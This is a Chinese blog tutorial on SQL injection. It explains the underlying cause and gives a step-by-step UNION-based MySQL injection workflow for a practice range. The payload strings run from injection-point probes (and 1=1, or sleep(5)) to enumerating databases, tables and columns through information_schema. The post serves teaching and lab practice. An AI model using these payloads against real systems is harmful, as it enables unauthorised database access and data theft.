SQL注入原理分析(网络安全)

最新推荐文章于 2024-05-30 14:52:09 发布
最新推荐文章于 2024-05-30 14:52:09 发布
阅读量255 收藏 5
点赞数 4
文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyang886_/article/details/137332222
版权

一、SQL注入本质分析

1、SQL注入本质

在讲到SQL注入之前我们先来聊一下什么是SQL注入? 注入攻击的本质,是把用户输入的数据当做SQL代码执行

8e22cd8c0981470281908c720b139c0a.png

 2、注入攻击的本质

两个关键条件:  

 第一个:

用户能够控制输入    

第二个:

程序原本要执行的代码,拼接了用户输入的数据然后进行执行

像我们常见的登陆框,一般就满足我们的第一个条件

Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中再在后台 Sql 服务器上解析执行进行的攻击

它目前黑客对数据库进行攻击的最常用手段之一。

二、分析靶场注入

1.分析靶场注入

靶场地址:

判断注入点:

and 1=1     页面正常

and 1=2      页面不正常

最简单的方法:

页面后面家‘,“ 看是否报错我的方法: 如果是数字类型的传参,可以试一下-1

http://www.com/news.php?id=1 页面显示 id=1 的新闻

http://www.com/news.php?id=2-1 页面显示 id=1 的新闻

也可以试试 and -1 = -1 , and -1 = -2 and 1 > 0 等方法 或者直接 or sleep(5) 【当然sleep也可能被拦截】

2、注入的基本流程

显错注入-联合查询(MYSQL数据库)注入的基本流程

bb3ee46df6d847478ecad1cf14389b9a.png

 通过系统自带库查询MYSQL在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

information_schema.tables 存放表名和库名以及其它相关内容

information_schema.columns 存放字段名和表名以及其它相关内容

三、显错注入靶场的做法

MYSQL注入:

判断当前页面字段总数

and 1=1 order by 1,2,3,4,5……

判断显示位

and 1=2 union select 1,2,3,4,5,6,7……

查当前数据库

and 1=2 union select 1,2,database()

查表名

and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

查列名

and 1=2 union select 1,2,column_name from information_schema.columns where table_name=表名 and

table_schema=database() limit 0,1

查字段内容

and 1=2 union select 1,字段名,字段名 from 表名 limit 0,1

 

mumusec
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
网络安全SQL注入详细分析
你在看屏幕的同时,屏幕也在注视着你
04-06 5478
SQL注入**超详**
网络安全威胁——SQL注入攻击
聚集机器学习、信息安全
04-04 8658
随着互联网的发展和普及,网络安全问题越来越突出。SQL注入SQL Injection)攻击是其中最普遍的安全隐患之一,它利用应用程序对用户输入数据的信任,将恶意SQL代码注入到应用程序中,导致敏感信息泄露、数据损坏或删除及系统瘫痪,给企业和个人带来巨大损失。
Web网络安全漏洞分析SQL注入原理详解
HBohan的博客
04-11 5544
本文主要为大家介绍了Web网络安全漏洞分析SQL注入原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪 一、SQL注入的基础 1.1 介绍SQL注入 SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 下面以PHP语句为例。 $query = "SELECT * FROM users WHERE id = $_GET['id']"; 由于.
网络安全-SQL注入原理、攻击及防御
关注网络安全、云原生安全
07-12 2万+
目录 SQL注入原理 SQL注入条件 防御SQL注入的方法 使用预编译语句 使用存储过程 检查数据类型 使用安全函数 SQL注入原理 程序员没有遵循代码与数据分离原则,使用户数据作为代码执行。 SQL注入条件 用户可以控制数据的输入。 原本要运行的代码拼接了用户的输入。 防御SQL注入的方法 使用预编译语句 绑定变量,攻击者无法改变SQL的结构。不同的编程语言Java、Php有不同的语法,就不做展示了。 使用存储过程 使用安全的存储过程对抗SQL注入,由于存储过程中也可能存在
网络安全——SQL注入实验
网络工程
12-12 2053
1、掌握SQL注入原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
SQL注入原理分析
2401_84466359的博客
05-29 1183
order by的作用及含义order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段进行排序,如果一共四个字段,你order by 5 数据库不知道怎么排序,就错误了无返回值。union select如何发挥作用union为联合查询,a联合b进行了查询,为查询了前面的sql语句(原有的)后再进行后面的sq查询(我们添加的),但两张表联合查询的字段数必须相同。输出位是什么。
Web安全之SQL注入
qq_42751192的博客
06-09 1926
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 16万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
网络安全必学SQL注入
kali_Ma的博客
11-04 7289
如果使用参数化查询,则在SQL语句中使用占位符表示需在运行时确定的参数值。当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。修改SQL语句之后,程序停止报错,但是却引入了SQL语句拼接的问题,如果没有对用户输入的内容做过滤,势必会产生SQL注入漏洞。至此,整个功能流程结束,在我们跟进的过程中,代码中无任何过滤语句,获取参数值,调用update方法更新,更新成功后返回结果。
SQL注入:floor报错注入的形成原理分析
Neonline254的博客
01-13 1005
进行SQL注入时,相信很多同学在遇到前端不回显时,会尝试SQL报错注入。常见的报错注入有:floor报错注入、updatexml报错注入和extractvalue报错注入等,不同于后两者利用Xpath解析错误,floor报错注入的成因更加复杂。本文将详细地分析floor报错注入的成因,希望能对您有所帮助。
SQL注入攻击及其预防方法研究
07-05
SQL注入攻击是黑客常用的网络攻击手段之一。文章分析SQL注入攻击的原理和攻击步骤,针对性地提出了从程序编写和服务器设置两方面有效预防SQL注入攻击的方法。
SQL注入攻击原理分析及JavaWeb环境下的防范措施.pdf
07-23
本文在分析SQL 注入原理的基础上,提出了几点Java Web 环境下防范措施。   随着Ineternet 技术的迅猛发展,为了能更充分地使用互联网这个世界上最大的交流平台,许多单位或个人纷纷建立自己的网站。但是...
SQL注入攻击与防御(安全技术经典译丛)
02-19
本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。针对SQL...
SQL注入全面讲解技术文档
03-31
SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很...12. SQL注入渗透某网络安全公司的网站全过程 42 13.利用SQL注入2分钟入侵网站全程实录 45
基于Python的自动化SQL注入工具开发
04-29
在众多网络安全漏洞中,SQL注入漏洞以其门槛低、权限高、破坏性强的特点稳居 历年网络安全漏洞排行榜第一名,如何针对SQL注入漏洞进行防范和化解,保障个 人、组织乃至国家的信息安全成为了网络安全领域研究的一个...
sql server:数据库处于单用户模式,当前某个用户已与其连接
weixin_42874924的博客
05-30 466
sql server:数据库处于单用户模式,当前某个用户已与其连接
基础—SQL—DQL(数据查询语言)聚合函数
最新发布
m0_74363339的博客
05-30 490
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
lxcw_sir的博客
05-29 401
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
PostgreSQL常用插件
PGCCC的博客
05-29 622
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
php做一个sql注入漏洞分析工具
09-10
1. 了解SQL注入漏洞的原理SQL注入漏洞是一种常见的Web安全漏洞,它指的是攻击者往Web表单里提交恶意代码,最终达到控制网站数据库的目的。 2. 建立一个数据库:在做SQL注入漏洞分析工具之前,你需要先建立一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值